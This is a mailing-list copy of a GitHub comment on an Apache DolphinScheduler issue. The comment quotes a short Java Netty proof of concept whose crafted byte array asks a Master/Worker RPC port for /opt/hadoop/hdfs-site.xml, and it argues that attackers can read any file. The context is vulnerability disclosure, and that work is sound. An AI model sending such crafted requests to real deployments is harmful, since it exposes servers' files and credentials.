xxjingcd commented on issue #13460:
URL:
https://github.com/apache/dolphinscheduler/issues/13460#issuecomment-1415192912
I
> ```java
> public static void main(String[] args) throws InterruptedException {
> EventLoopGroup group = new NioEventLoopGroup();
> Bootstrap b = new Bootstrap();
> b.group(group)
> .channel(NioSocketChannel.class)
> .handler(new ChannelInitializer<SocketChannel>() {
> @Override
> public void initChannel(SocketChannel ch) throws
Exception {
> ChannelPipeline p = ch.pipeline();
> p.addLast(new NettyDecoder(), new
EchoMsgHandler());
> }
> });
> // Start the client.
> ChannelFuture f = b.connect("127.0.0.1", 1234).sync();
> Channel channel = f.channel();
>
> // access /opt/hadoop/hdfs-site.xml
> byte[] bytes = {-66, 0, 6, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 12,
123, 34, 105, 116, 101, 109, 115, 34, 58, 123, 125, 125, 0, 0, 0, 36, 123, 34,
112, 97, 116, 104, 34, 58, 34, 47, 111, 112, 116, 47, 104, 97, 100, 111, 111,
112, 47, 104, 100, 102, 115, 45, 115, 105, 116, 101, 46, 120, 109, 108, 34,
125};
> ByteBuf mockAttackRequest = Unpooled.wrappedBuffer(bytes);
> channel.writeAndFlush(mockAttackRequest);
> }
> ```
>
> > The `bytes` array is the command to view `/opt/hadoop/hdfs-site.xml`
file. And the `bytes` array can easily be constructed by a few codes;
>
> Through the above code, you will get `/opt/hadoop/hdfs-site.xml` file
which is not a log file from the `Master` or `Worker`; That means a hacker can
access any file at any position;
>
> "DS interval" can be easily broken on network communications ;
I have send the detail of this attacked example to
`[email protected]`. @zhongjiajie
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
